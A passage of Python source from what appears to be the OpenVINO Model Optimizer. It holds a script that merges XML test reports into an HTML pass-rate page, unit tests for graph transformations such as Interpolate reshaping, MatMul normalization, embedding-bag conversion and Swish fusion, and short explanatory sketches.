'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceMean-1',
'RegionYOLO-0',
'Relu-0',
'ReorgYOLO-0',
'GRUSequence-5',
'Round-5',
'ScatterNDUpdate-3',
'ShapeOf-0',
'ShapeOf-3',
'Sigmoid-0',
'Sin-0',
'SoftPlus-4',
'Softmax-1',
'Split-1',
'StridedSlice-1',
'Substract-1',
'Swish-4',
'Tile-0',
'TopK-1',
'TopK-3'
]
pass_rate_avg = dict()
general_pass_rate = dict()
general_test_count = dict()
general_passed_tests = dict()
def merge_xmls(xmls: list):
if len(xmls) == 1:
return xmls[0]
summary = ET.Element("report")
summary.set("timestamp", xmls[0].attrib["timestamp"])
results = ET.SubElement(summary, "results")
ops_list = ET.SubElement(summary, "ops_list")
for xml in xmls:
for op in xml.find("ops_list"):
if ops_list.find(op.tag) is None:
ET.SubElement(ops_list, op.tag)
for device in xml.find("results"):
device_results = results.find(device.tag)
if device_results is None:
results.append(device)
else:
for entry in device:
if device_results.find(entry.tag) is not None:
current_timestamp = datetime.strptime(xml.attrib["timestamp"], "%d-%m-%Y %H:%M:%S")
base_timestamp = datetime.strptime(summary.attrib["timestamp"], "%d-%m-%Y %H:%M:%S")
if current_timestamp > base_timestamp:
device_results.find(entry.tag).attrib = entry.attrib
else:
device_results.append(entry)
return summary
xmls = []
for xml in args.xml:
try:
xmls.append(ET.parse(xml).getroot())
except ET.ParseError:
print("Error parsing", xml)
root = merge_xmls(xmls)
timestamp = root.attrib["timestamp"]
ops = []
for op in root.find("ops_list"):
ops.append(op.tag)
ordered_ops = sorted(ops)
results = {}
for device in root.find("results"):
results[device.tag] = {op.tag: op.attrib for op in device}
pass_rate_avg[device.tag] = 0
general_test_count[device.tag] = 0
general_passed_tests[device.tag] = 0
for op in results[device.tag]:
pass_rate = round(float(results[device.tag][op]["passrate"]), 1)
results[device.tag][op]["passrate"] = pass_rate
pass_rate_avg[device.tag] += pass_rate
general_test_count[device.tag] += (int(results[device.tag][op]["passed"]) + int(results[device.tag][op]["failed"]) +
int(results[device.tag][op]["crashed"]) + int(results[device.tag][op]["skipped"]))
general_passed_tests[device.tag] += int(results[device.tag][op]["passed"])
pass_rate_avg[device.tag] /= len(results[device.tag])
pass_rate_avg[device.tag] = round(float(pass_rate_avg[device.tag]), 1)
general_pass_rate[device.tag] = general_passed_tests[device.tag] * 100 / general_test_count[device.tag]
general_pass_rate[device.tag] = round(float(general_pass_rate[device.tag]), 1)
devices = results.keys()
file_loader = FileSystemLoader('template')
env = Environment(loader=file_loader)
template = env.get_template('report_template.html')
res = template.render(ordered_ops=ordered_ops, devices=devices, results=results, timestamp=timestamp,
general_pass_rate=general_pass_rate, pass_rate_avg=pass_rate_avg,
verified_operations=verified_operations)
with open(os.path.join(args.out, "report.html"), "w") as f:
f.write(res)
```
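A minimal sketch (not part of the OpenVINO sources) of the report shape `merge_xmls` above consumes; the device name, op name and counters are hypothetical. With two overlapping reports, the entry coming from the report with the later `timestamp` wins:
```python
import xml.etree.ElementTree as ET
from datetime import datetime

older = ET.fromstring(
    '<report timestamp="01-01-2021 10:00:00">'
    '<results><CPU><Relu-0 passed="8" failed="2" crashed="0" skipped="0" passrate="80.0"/></CPU></results>'
    '<ops_list><Relu-0/></ops_list>'
    '</report>')
newer = ET.fromstring(
    '<report timestamp="02-01-2021 10:00:00">'
    '<results><CPU><Relu-0 passed="10" failed="0" crashed="0" skipped="0" passrate="100.0"/></CPU></results>'
    '<ops_list><Relu-0/></ops_list>'
    '</report>')

# Same timestamp comparison merge_xmls performs for overlapping entries
newer_wins = datetime.strptime(newer.attrib["timestamp"], "%d-%m-%Y %H:%M:%S") > \
             datetime.strptime(older.attrib["timestamp"], "%d-%m-%Y %H:%M:%S")
print(newer_wins)  # True -> the merged summary keeps passrate="100.0" for CPU/Relu-0
```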
#### File: extensions/back/InterpolateReshape_test.py
```python
import unittest
from argparse import Namespace
import numpy as np
from extensions.back.InterpolateReshape import InterpolateReshapeWA, InterpolateConcat
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, regular_op_with_shaped_data, valued_const_with_data, connect, \
connect_data
nodes = {
**regular_op_with_shaped_data('placeholder', [1, 3, 30, 40], {'type': 'Parameter', 'op': 'Parameter'}),
**valued_const_with_data('out_shape', np.array([60, 160])),
**regular_op_with_shaped_data('interpolate', [1, 3, 60, 160], {'type': 'Interpolate', 'axes': [2, 3],
'op': 'Interpolate', 'version': 'opset1'}),
**regular_op_with_shaped_data('shape', [4], {'type': 'ShapeOf', 'op': 'ShapeOf'}),
**valued_const_with_data('indices', np.array([2, 3])),
**valued_const_with_data('axis', np.array(0)),
**regular_op_with_shaped_data('gather', [2], {'type': 'Gather', 'op': 'Gather'}),
**valued_const_with_data('multiplier', np.array([2, 4])),
**regular_op_with_shaped_data('mul', [2], {'type': 'Multiply', 'op': 'Mul'}),
**regular_op_with_shaped_data('placeholder_1', [1, 3, 60, 160], {'type': 'Parameter', 'op': 'Parameter'}),
**regular_op_with_shaped_data('concat', [1, 7, 60, 160], {'type': 'Concat', 'axis': 1, 'op': 'Concat'}),
**result(),
}
class TestInterpolateReshapeWA(unittest.TestCase):
def test_interpolate_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'output'),
], nodes_with_edges_only=True)
InterpolateReshapeWA().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect_data('placeholder', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '0:mul'),
*connect('multiplier', '1:mul'),
*connect('mul', '1:interpolate'),
*connect('interpolate', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
class TestInterpolateConcat(unittest.TestCase):
def test_interpolate_concat_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
InterpolateConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('placeholder_1', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect_data('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: extensions/back/MatMulNormalizer_test.py
```python
import unittest
from argparse import Namespace
from generator import generate, generator
from extensions.back.MatMulNormalizer import SmartReshape_HC_Reshape_MatMul
from extensions.ops.MatMul import MatMul
from mo.front.common.partial_infer.utils import int64_array
from mo.ops.reshape import Reshape
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, regular_op_with_shaped_data, valued_const_with_data, \
result, connect
from mo.utils.unittest.graph import regular_op_with_empty_data as op_with_empty_data
@generator
class SmartReshape_HC_Reshape_MatMulTest(unittest.TestCase):
@generate(
*[
([1, 20, 30], [30, 40], [20, -1], False, False, [-1, 30]),
([1, 20, 30], [40, 30], [20, -1], False, True, [-1, 30]),
([1, 30, 20], [30, 40], [-1, 20], True, False, [30, -1]),
([1, 30, 20], [40, 30], [-1, 20], True, True, [30, -1]),
]
)
def test_reshape_on_the_A_input(self,
in1_shape, in2_shape, reshape_pattern, transpose_a, transpose_b, updated_pattern):
nodes = {
**regular_op_with_shaped_data('in_1', in1_shape, dict(type='Parameter', op='Parameter')),
**regular_op_with_shaped_data('in_2', in2_shape, dict(type='Parameter', op='Parameter')),
**valued_const_with_data('dim', int64_array(reshape_pattern)),
**op_with_empty_data('reshape',
dict(type='Reshape', op='Reshape', infer=Reshape.infer, need_shape_inference=True)),
**op_with_empty_data('matmul',
dict(type='MatMul', op='MatMul', infer=MatMul.infer, need_shape_inference=True,
transpose_a=transpose_a, transpose_b=transpose_b, dim_attrs={})),
**result(),
}
edges = [
*connect('in_1:0', '0:reshape'),
*connect('dim:0', '1:reshape'),
*connect('reshape:0', '0:matmul'),
*connect('in_2:0', '1:matmul'),
*connect('matmul:0', 'output'),
]
graph = build_graph(nodes_attrs=nodes, edges=edges, cli=Namespace(static_shape=True))
graph.clean_up()
SmartReshape_HC_Reshape_MatMul().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes_attrs=nodes, edges=edges, update_attributes={
'dim': {'value': int64_array(updated_pattern)}, 'dim_d': {'value': int64_array(updated_pattern)}})
graph_ref.clean_up()
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
@generate(*[
([20, 30], [1, 30, 40], [-1, 40], False, False, [30, -1]),
([20, 30], [1, 40, 30], [40, -1], False, True, [-1, 30]),
([30, 20], [1, 30, 40], [-1, 40], True, False, [30, -1]),
([30, 20], [1, 40, 30], [40, -1], True, True, [-1, 30]),
])
def test_reshape_on_the_B_input(self,
in1_shape, in2_shape, reshape_pattern, transpose_a, transpose_b, updated_pattern):
nodes = {
**regular_op_with_shaped_data('in_1', in1_shape, dict(type='Parameter', op='Parameter')),
**regular_op_with_shaped_data('in_2', in2_shape, dict(type='Parameter', op='Parameter')),
**valued_const_with_data('dim', int64_array(reshape_pattern)),
**op_with_empty_data('reshape',
dict(type='Reshape', op='Reshape', infer=Reshape.infer, need_shape_inference=True)),
**op_with_empty_data('matmul',
dict(type='MatMul', op='MatMul', infer=MatMul.infer, need_shape_inference=True,
transpose_a=transpose_a, transpose_b=transpose_b, dim_attrs={})),
**result(),
}
edges = [
*connect('in_1:0', '0:matmul'),
*connect('in_2:0', '0:reshape'),
*connect('dim:0', '1:reshape'),
*connect('reshape:0', '1:matmul'),
*connect('matmul:0', 'output'),
]
graph = build_graph(nodes_attrs=nodes, edges=edges, cli=Namespace(static_shape=True))
graph.clean_up()
SmartReshape_HC_Reshape_MatMul().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes_attrs=nodes, edges=edges, update_attributes={
'dim': {'value': int64_array(updated_pattern)}, 'dim_d': {'value': int64_array(updated_pattern)}})
graph_ref.clean_up()
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: extensions/front/ATenToEmbeddingBag_test.py
```python
import unittest
import numpy as np
from extensions.front.ATenToEmbeddingBag import AtenToEmbeddingBag
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, \
regular_op, const
class AtenToEmbeddingBagTest(unittest.TestCase):
def test(self):
nodes = {
**const('weights_inp', np.random.randn(100, 2)),
**regular_op('indices_inp', {'type': 'Parameter'}),
**regular_op('offsets_inp', {'type': 'Parameter'}),
**regular_op('aten', {'type': None, 'kind': 'op', 'op': 'ATen', 'operator': 'embedding_bag', 'mode': 0,
'name': 'my_aten'}),
**regular_op('emb_bag', {'type': 'EmbeddingBagOffsetsSum', 'kind': 'op', 'op': 'EmbeddingBagOffsetsSum'}),
**result('result'),
}
edges = [('weights_inp', 'aten'),
('indices_inp', 'aten'),
('offsets_inp', 'aten'),
('aten', 'result'),
]
graph = build_graph(nodes, edges)
graph.graph['layout'] = 'NCHW'
graph.stage = 'front'
edges_ref = [('weights_inp', 'emb_bag'),
('indices_inp', 'emb_bag'),
('offsets_inp', 'emb_bag'),
('emb_bag', 'result'),
]
graph_ref = build_graph(nodes, edges_ref)
AtenToEmbeddingBag().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_packed(self):
nodes = {
**const('weights_inp', np.random.randn(100, 4)),
**regular_op('indices_inp', {'type': 'Parameter'}),
**regular_op('aten', {'type': None, 'kind': 'op', 'op': 'ATen', 'operator': 'embedding_bag', 'mode': 0,
'name': 'my_aten'}),
**regular_op('emb_bag', {'type': 'EmbeddingBagPackedSum', 'kind': 'op',
'op': 'EmbeddingBagPackedSum'}),
**result('result'),
}
edges = [('weights_inp', 'aten'),
('indices_inp', 'aten'),
('aten', 'result'),
]
graph = build_graph(nodes, edges)
graph.graph['layout'] = 'NCHW'
graph.stage = 'front'
edges_ref = [('weights_inp', 'emb_bag'),
('indices_inp', 'emb_bag'),
('emb_bag', 'result'),
]
graph_ref = build_graph(nodes, edges_ref)
AtenToEmbeddingBag().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
def test_per_sample_weights(self):
nodes = {
**const('weights_inp', np.random.randn(100, 2)),
**regular_op('indices_inp', {'type': 'Parameter'}),
**regular_op('offsets_inp', {'type': 'Parameter'}),
**regular_op('per_sample_weights', {'type': 'Parameter'}),
**regular_op('aten', {'type': None, 'kind': 'op', 'op': 'ATen', 'operator': 'embedding_bag', 'mode': 0,
'name': 'my_aten'}),
**regular_op('emb_bag', {'type': 'EmbeddingBagOffsetsSum', 'kind': 'op',
'op': 'EmbeddingBagOffsetsSum'}),
**regular_op('WeightsRank', {'type': None, 'kind': 'op', 'op': 'Rank'}),
**regular_op('WeightsRank/axis', {'type': 'Add', 'kind': 'op', 'op': 'Add'}),
**regular_op('gather1', {'type': 'Gather', 'kind': 'op', 'op': 'Gather'}),
**regular_op('gather2', {'type': 'Gather', 'kind': 'op', 'op': 'Gather'}),
**regular_op('WeightsShape', {'type': 'ShapeOf', 'kind': 'op', 'op': 'ShapeOf'}),
**regular_op('Broadcast', {'type': 'Broadcast', 'kind': 'op', 'op': 'Broadcast'}),
**regular_op('Unsqueeze', {'type': 'Unsqueeze', 'kind': 'op', 'op': 'Unsqueeze'}),
**const('WeightsShape/Axis', int64_array(0)),
**const('zero1', int64_array(0)),
**const('zero2', int64_array(0)),
**const('Unsqueeze/value', int64_array(0)),
**const('Broadcast/value', int64_array(0)),
**const('neg', int64_array(-1)),
**regular_op('Concat', {'type': 'Concat', 'kind': 'op', 'op': 'Concat'}),
**result('result'),
}
edges = [('weights_inp', 'aten'),
('indices_inp', 'aten'),
('offsets_inp', 'aten'),
('per_sample_weights', 'aten'),
('aten', 'result'),
]
graph = build_graph(nodes, edges, nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph.stage = 'front'
edges_ref = [('weights_inp', 'Concat', {'in': 0, 'out': 0}),
('weights_inp', 'WeightsShape', {'in': 0, 'out': 0}),
('weights_inp', 'WeightsRank', {'in': 0, 'out': 0}),
('WeightsRank', 'WeightsRank/axis'),
('neg', 'WeightsRank/axis'),
('WeightsShape', 'gather1', {'in': 0, 'out': 0}),
('WeightsRank/axis', 'gather1'),
('WeightsShape/Axis', 'gather1'),
('WeightsShape', 'gather2', {'in': 0, 'out': 0}),
('zero1', 'gather2'),
('zero2', 'gather2'),
('Broadcast/value', 'Broadcast'),
('gather1', 'Broadcast'),
('Broadcast', 'Unsqueeze'),
('Unsqueeze/value', 'Unsqueeze'),
('Unsqueeze', 'Concat'),
('Concat', 'emb_bag'),
('indices_inp', 'emb_bag'),
('offsets_inp', 'emb_bag'),
('gather2', 'emb_bag'),
('per_sample_weights', 'emb_bag'),
('emb_bag', 'result'),
]
graph_ref = build_graph(nodes, edges_ref, nodes_with_edges_only=True)
AtenToEmbeddingBag().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
```
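For context, a tiny NumPy sketch (hypothetical values) of the EmbeddingBagOffsetsSum semantics that the replacement above maps the ATen `embedding_bag` (mode 0, i.e. sum) onto: rows of the weights table are gathered by `indices` and summed per bag, with `offsets` marking where each bag starts:
```python
import numpy as np

weights = np.arange(10.0).reshape(5, 2)   # 5 embeddings of width 2
indices = np.array([0, 2, 4, 1])          # flattened lookup indices
offsets = np.array([0, 3])                # bag 0 = indices[0:3], bag 1 = indices[3:]

bounds = np.append(offsets, len(indices))
bags = np.stack([weights[indices[s:e]].sum(axis=0)
                 for s, e in zip(bounds[:-1], bounds[1:])])
print(bags)   # [[12. 15.]
              #  [ 2.  3.]]
```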
#### File: front/kaldi/set_ports.py
```python
from mo.front.common.replacement import FrontReplacementSubgraph
from mo.graph.graph import Node, Graph
class SetPortsPattern(FrontReplacementSubgraph):
"""
    Pass used to set ports for a graph loaded from Kaldi
"""
enabled = True
def run_before(self):
from extensions.front.restore_ports import RestorePorts
return [RestorePorts]
def run_after(self):
from extensions.load.loader import LoadFinish
return [LoadFinish]
def find_and_replace_pattern(self, graph: Graph):
graph.stage = 'front'
for node_id in graph.nodes(data=False):
node = Node(graph, node_id)
inputs = node.get_sorted_inputs()
outputs = node.get_sorted_outputs()
in_ports_count = node.in_ports_count if node.has_valid('in_ports_count') else len(inputs)
out_ports_count = node.out_ports_count if node.has_valid('out_ports_count') else len(outputs)
node['_in_ports'] = {}
node['_out_ports'] = {}
if in_ports_count is not None:
for idx in range(in_ports_count):
node.add_input_port(idx=idx)
if out_ports_count is not None:
for idx in range(out_ports_count):
node.add_output_port(idx=idx)
idx = 0
for in_node_id, edge_attrs in inputs:
graph.remove_edge(in_node_id, node_id)
if len(Node(graph, in_node_id).out_ports()) == 0:
Node(graph, in_node_id).add_output_port(0)
in_node = Node(graph, in_node_id)
in_node.out_port(edge_attrs['out']).connect(node.in_port(idx))
# need to keep this attribute in edge for correct .mapping file generation and
# for generation of "names" field in IR
in_node.out_edge(edge_attrs['out'])['fw_tensor_debug_info'] = edge_attrs['fw_tensor_debug_info']
if idx < in_ports_count - 1:
idx = idx + 1
idx = 0
for out_node_id, edge_attrs in outputs:
graph.remove_edge(node_id, out_node_id)
if len(Node(graph, out_node_id).in_ports()) == 0:
Node(graph, out_node_id).add_input_port(0)
node.out_port(idx).connect(Node(graph, out_node_id).in_port(edge_attrs['in']))
# need to keep this attribute in edge for correct .mapping file generation and
# for generation of "names" field in IR
node.out_edge(idx)['fw_tensor_debug_info'] = edge_attrs['fw_tensor_debug_info']
if idx < out_ports_count - 1:
idx = idx + 1
```
#### File: front/mxnet/gluoncv_ssd_anchors_test.py
```python
import numpy as np
import unittest
from extensions.front.mxnet.gluoncv_ssd_anchors import SsdAnchorsReplacer
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph
nodes_attributes = {
'slice_like': {'kind': 'op', 'op': 'slice_like'},
'model_reshape0': {'kind': 'op', 'op': 'Reshape'},
'model_reshape0_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1, 4])},
'model_reshape1': {'kind': 'op', 'op': 'Reshape'},
'model_reshape1_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1, 4])},
'model_reshape2': {'kind': 'op', 'op': 'Reshape'},
'model_reshape2_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1])},
'reshape0': {'kind': 'op', 'op': 'Reshape'},
'reshape0_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, -1])},
'concat': {'kind': 'op', 'op': 'Concat'},
'reshape1': {'kind': 'op', 'op': 'Reshape'},
'reshape1_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, 2, -1])},
'split': {'kind': 'op', 'op': 'Split', 'num_splits': 2},
'split_const': {'kind': 'op', 'op': 'Const', 'value': int64_array(1)},
'reshape2': {'kind': 'op', 'op': 'Reshape'},
'reshape2_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([-1, 4])},
'value': {'kind': 'op', 'op': 'Split', 'num_splits': 4},
'value_const': {'kind': 'op', 'op': 'Const', 'value': int64_array(1)},
'div_1': {'kind': 'op', 'op': 'Div'},
'div_1_const': {'kind': 'op', 'op': 'Const', 'value': np.array([2], dtype=np.float32)},
'div_2': {'kind': 'op', 'op': 'Div'},
'div_2_const': {'kind': 'op', 'op': 'Const', 'value': np.array([2], dtype=np.float32)},
'xmin': {'kind': 'op', 'op': 'Sub'},
'ymin': {'kind': 'op', 'op': 'Sub'},
'xmax': {'kind': 'op', 'op': 'Add'},
'ymax': {'kind': 'op', 'op': 'Add'},
'concat_value': {'kind': 'op', 'op': 'Concat', 'axis': 1},
'reshape3': {'kind': 'op', 'op': 'Reshape'},
'reshape3_const': {'kind': 'op', 'op': 'Const', 'value': int64_array([1, 1, -1])},
'end_concat': {'kind': 'op', 'op': 'Concat'},
'detection_output': {'kind': 'op', 'op': 'DetectionOutput'}
}
class SsdAnchorsReplacerTest(unittest.TestCase):
def test_replacer(self):
graph = build_graph(
nodes_attrs=nodes_attributes,
edges=[
('slice_like', 'model_reshape0', {'in': 0}),
('model_reshape0_const', 'model_reshape0', {'in': 1}),
('model_reshape0', 'model_reshape1', {'in': 0}),
('model_reshape1_const', 'model_reshape1', {'in': 1}),
('model_reshape1', 'model_reshape2', {'in': 0}),
('model_reshape2_const', 'model_reshape2', {'in': 1}),
('model_reshape2', 'reshape0', {'in': 0}),
('reshape0_const', 'reshape0', {'in': 1}),
('reshape0', 'concat'),
('concat', 'detection_output', {'in': 2})
],
nodes_with_edges_only=True
)
ref_graph = build_graph(
nodes_attrs=nodes_attributes,
edges=[
('slice_like', 'model_reshape0', {'in': 0}),
('model_reshape0_const', 'model_reshape0', {'in': 1}),
('model_reshape0', 'model_reshape1', {'in': 0}),
('model_reshape1_const', 'model_reshape1', {'in': 1}),
('model_reshape1', 'model_reshape2', {'in': 0}),
('model_reshape2_const', 'model_reshape2', {'in': 1}),
('model_reshape2', 'reshape0', {'in': 0}),
('reshape0_const', 'reshape0', {'in': 1}),
('reshape0', 'concat'),
('concat', 'reshape1', {'in': 0}),
('reshape1_const', 'reshape1', {'in': 1}),
('reshape1', 'split', {'in': 0}),
('split_const', 'split', {'in': 1}),
('split', 'reshape2', {'out': 0, 'in': 0}),
('reshape2_const', 'reshape2', {'in': 1}),
('reshape2', 'value', {'in': 0}),
('value_const', 'value', {'in': 1}),
('value', 'xmin', {'out': 0, 'in': 0}),
('value', 'ymin', {'out': 1, 'in': 0}),
('value', 'xmax', {'out': 0, 'in': 1}),
('value', 'ymax', {'out': 1, 'in': 1}),
('value', 'div_1', {'out': 2, 'in': 0}),
('value', 'div_2', {'out': 3, 'in': 0}),
('div_1_const', 'div_1', {'in': 1}),
('div_2_const', 'div_2', {'in': 1}),
('div_1', 'xmin', {'in': 1, 'out': 0}),
('div_1', 'xmax', {'in': 0, 'out': 0}),
('div_2', 'ymin', {'in': 1, 'out': 0}),
('div_2', 'ymax', {'in': 0, 'out': 0}),
('xmin', 'concat_value', {'in': 0}),
('ymin', 'concat_value', {'in': 1}),
('xmax', 'concat_value', {'in': 2}),
('ymax', 'concat_value', {'in': 3}),
('concat_value', 'reshape3', {'in': 0}),
('reshape3_const', 'reshape3', {'in': 1}),
('reshape3', 'end_concat', {'in': 0}),
('split', 'end_concat', {'in': 1}),
('end_concat', 'detection_output', {'in': 2})
],
update_attributes={
'concat': {'axis': 1}
},
nodes_with_edges_only=True
)
graph.stage = 'front'
graph.graph['cmd_params'].data_type = 'FP32'
SsdAnchorsReplacer().find_and_replace_pattern(graph)
flag, resp = compare_graphs(graph, ref_graph, 'detection_output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
#### File: front/mxnet/ssd_pattern_remove_flatten_test.py
```python
import unittest
from extensions.front.mxnet.ssd_pattern_remove_flatten import SsdPatternRemoveFlatten
from mo.graph.graph import Node
from mo.utils.unittest.graph import build_graph
class TestSsdPatternRemoveFlatten(unittest.TestCase):
def test_pattern_remove_transpose(self):
graph = build_graph({'node_1': {'type': 'Identity', 'kind': 'op', 'op': 'Parameter'},
'node_2': {'type': 'Identity', 'kind': 'op'},
'node_multi_box_prior': {'type': '_contrib_MultiBoxPrior', 'kind': 'op',
'op': '_contrib_MultiBoxPrior'},
'node_flatten': {'type': 'Flatten', 'kind': 'op', 'op': 'Flatten'},
'node_3': {'type': 'Identity', 'kind': 'op'},
},
[('node_1', 'node_2'),
('node_2', 'node_multi_box_prior'),
('node_multi_box_prior', 'node_flatten'),
('node_flatten', 'node_3'), ],
)
pattern = SsdPatternRemoveFlatten()
pattern.find_and_replace_pattern(graph)
self.assertFalse(graph.has_node('node_flatten'))
self.assertTrue(graph.has_edge(Node(graph, 'node_multi_box_prior').id, Node(graph, 'node_3').id))
```
#### File: extensions/front/sub_test.py
```python
import unittest
import numpy as np
from extensions.front.sub import Sub
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, regular_op_with_shaped_data, valued_const_with_data, connect, \
connect_data
nodes = {
**regular_op_with_shaped_data('placeholder_1', [1, 227, 227, 3], {'type': 'Parameter'}),
**regular_op_with_shaped_data('placeholder_2', [1, 227, 227, 3], {'type': 'Parameter'}),
**regular_op_with_shaped_data('sub', None, {'op': 'Sub', 'type': 'Subtract', 'name': 'my_sub'}),
**regular_op_with_shaped_data('negate', [1, 227, 227, 3], {'type': 'Multiply'}),
**valued_const_with_data('minus_one', np.array(-1.)),
**regular_op_with_shaped_data('add', None, {'type': 'Add'}),
**result(),
}
class TestSub(unittest.TestCase):
def test_sub_test_1(self):
# Test with two different inputs from two placeholders
graph = build_graph(nodes, [
*connect('placeholder_1', '0:sub'),
*connect('placeholder_2', '1:sub'),
*connect('sub', 'output'),
], nodes_with_edges_only=True)
Sub().find_and_replace_pattern(graph)
graph_ref = build_graph(nodes, [
*connect('placeholder_1', '0:add'),
*connect('placeholder_2', '0:negate'),
*connect('minus_one', '1:negate'),
*connect('negate', '1:add'),
*connect('add', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
self.assertTrue(graph.node[graph.get_nodes_with_attributes(type='Add')[0]]['name'] == 'my_sub')
def test_sub_test_2(self):
# Test with two same inputs from one placeholder
graph = build_graph(nodes, [
*connect('placeholder_1:0', '0:sub'),
*connect_data('placeholder_1:0', '1:sub'),
*connect('sub', 'output'),
], nodes_with_edges_only=True)
Sub().find_and_replace_pattern(graph)
graph_ref = build_graph(nodes, [
*connect('placeholder_1:0', '0:add'),
*connect_data('placeholder_1:0', '0:negate'),
*connect('minus_one', '1:negate'),
*connect('negate', '1:add'),
*connect('add', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
self.assertTrue(graph.node[graph.get_nodes_with_attributes(type='Add')[0]]['name'] == 'my_sub')
```
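The `Sub` replacement exercised above rests on the identity a - b = a + (-1) * b, which is what the `negate` (Multiply by -1) plus `Add` reference graphs encode; a one-line NumPy check with arbitrary values:
```python
import numpy as np

a, b = np.random.randn(2, 3), np.random.randn(2, 3)
assert np.allclose(a - b, a + (-1.0) * b)   # Sub == Add(x, Mul(y, -1))
```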
#### File: extensions/front/Swish_fusion_test.py
```python
import unittest
from extensions.front.Swish_fusion import SwishWithSigmoidWithoutBeta, SwishWithSigmoidWithBeta
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, regular_op, result, build_graph_with_edge_attrs
ref_nodes = {**regular_op('input', {'type': 'Parameter'}),
**regular_op('swish', {'type': 'Swish', 'name': 'final_mul'}),
**result('result')
}
ref_edges = [('input', 'swish'), ('swish', 'result')]
class SwishWithSigmoidWithoutBetaTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}
edges = [('input', 'mul', {'in': 0, 'out': 0}),
('input', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul', {'in': 1, 'out': 0}),
('mul', 'result', {'in': 0, 'out': 0})]
def test_swish_with_sigmoid_without_beta_test(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
graph_ref = build_graph(ref_nodes, ref_edges)
graph.stage = 'front'
SwishWithSigmoidWithoutBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'Swish')
def test_swish_with_sigmoid_without_beta_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}, [('input_2', 'mul', {'in': 0, 'out': 0}),
('input', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul', {'in': 1, 'out': 0}),
('mul', 'result', {'in': 0, 'out': 0})], {})
graph_ref = graph.copy()
graph.stage = 'front'
SwishWithSigmoidWithoutBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
class SwishWithSigmoidWithBetaTest(unittest.TestCase):
nodes = {
**regular_op('input', {'type': 'Parameter'}),
**regular_op('beta', {'type': 'Parameter'}),
**regular_op('mul_beta', {'op': 'Mul'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}
edges = [('input', 'mul_beta', {'in': 0, 'out': 0}),
('input', 'mul_2', {'in': 0, 'out': 0}),
